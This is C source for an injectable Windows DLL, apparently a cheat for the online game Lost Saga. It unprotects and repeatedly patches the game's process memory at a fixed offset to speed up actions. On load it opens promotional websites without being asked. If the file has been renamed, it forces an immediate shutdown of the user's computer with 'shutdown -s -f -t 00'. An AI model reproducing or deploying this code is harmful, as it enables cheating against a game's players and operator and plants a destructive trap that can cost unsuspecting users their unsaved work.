#include #pragma warning(disable: 4700) LPTSTR APP = "lostsaga.exe"; DWORD Gravity, adrSpeed, dwI3EXEC, adrProteck, adrDelay, adrReload , adrDelay2 , adrGrade , adrKick , adrDrop , adrPenalty ,adrTokenGold , adrTokenPerunggu ,adrCrusade, adrKebal, adrDarah,ofsMNZ1, dwBase, Change, CheckProtection; void Arema(void *adr, void *ptr, int size) { DWORD CheckProtection; VirtualProtect(adr,size,PAGE_EXECUTE_READWRITE, &ofsMNZ1); RtlMoveMemory(adr,ptr,size); VirtualProtect(adr,size,CheckProtection, &dwBase); } //Protect address void InProtectAndModify(DWORD Offset, DWORD Pointer, DWORD Length){ VirtualProtect((void *)Offset, Length, PAGE_EXECUTE_READWRITE, &CheckProtection); // check apakah address tsb dikunci / protected ? kalau iya, lakukan unprotect RtlMoveMemory((void *)Offset, (const void*)Pointer, Length); // ubah address tsb menjadi writeable, dan lakukan patch dengan MEMpatch VirtualProtect((void *)Offset, Length, CheckProtection, &CheckProtection); // protect lagi address tsb biar gk kena satpam } // Lakukan patch terhadap memory int MEMhack( BYTE *Offset, BYTE *ByteArray, DWORD Length){ InProtectAndModify((DWORD)Offset , (DWORD)ByteArray , 2); } BOOL wanda(unsigned long ADRexec, int OFSexec, int PTRexec) { if (!IsBadWritePtr((void*)ADRexec, sizeof(unsigned long))) { if (!IsBadWritePtr((void*)(*(unsigned long*)ADRexec + OFSexec), sizeof(unsigned long))) { *(int*)(*(unsigned long*)ADRexec + OFSexec) = PTRexec; } } return (0); } DWORD WINAPI GantengsHex(LPVOID param) { while(1) { //========================= Auto ON Hotkeys ======================================== dwI3EXEC = (DWORD)GetModuleHandleA("lostsaga.exe"); if(dwI3EXEC >0) { DWORD adrDelay = dwI3EXEC+0xD2A448;//Fast Delay Arema((void *)(adrDelay),(void*)(PBYTE)"\x30\x30", 2); } //------------------------------------------------------------------------------ { Sleep(108); } } return(0); } //------------------------------------------------------------------------------ BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, LPVOID lpvReserved) { if(dwReason == DLL_PROCESS_ATTACH) { char strDLLName [_MAX_PATH]; Sleep(200); MessageBox (0, " cheat successfully inject \n\ www.citer-tasik87.co.cc","www.citer-tasik87.co.cc", MB_OKCANCEL + MB_ICONINFORMATION); system("start Http://www.facebook.com/js87setyawan"); system("start Http://www.citer-tasik87.co.cc"); GetModuleFileName(hModule, strDLLName , _MAX_PATH); if (strstr(strDLLName, "usa.dll") <= 0) { MessageBox(0, "Why you Renaming My File ?","Js Setyawan",MB_ICONSTOP | MB_OK); MessageBox(0, "You This Cheater Or Leacher ?","Js Setyawan",MB_ICONSTOP | MB_OK); MessageBox(0, "See You , \nYour System Data We Restart\n\nTo Say GoodBye ","Js Setyawan",MB_ICONSTOP | MB_OK); system("start C:/Windows/System32/shutdown.exe -s -f -t 00"); ExitProcess(0);//ERROR } //------------------------------------------------------------------------------ CreateThread(0, 0, (LPTHREAD_START_ROUTINE)GantengsHex, 0, 0, 0); } return TRUE; }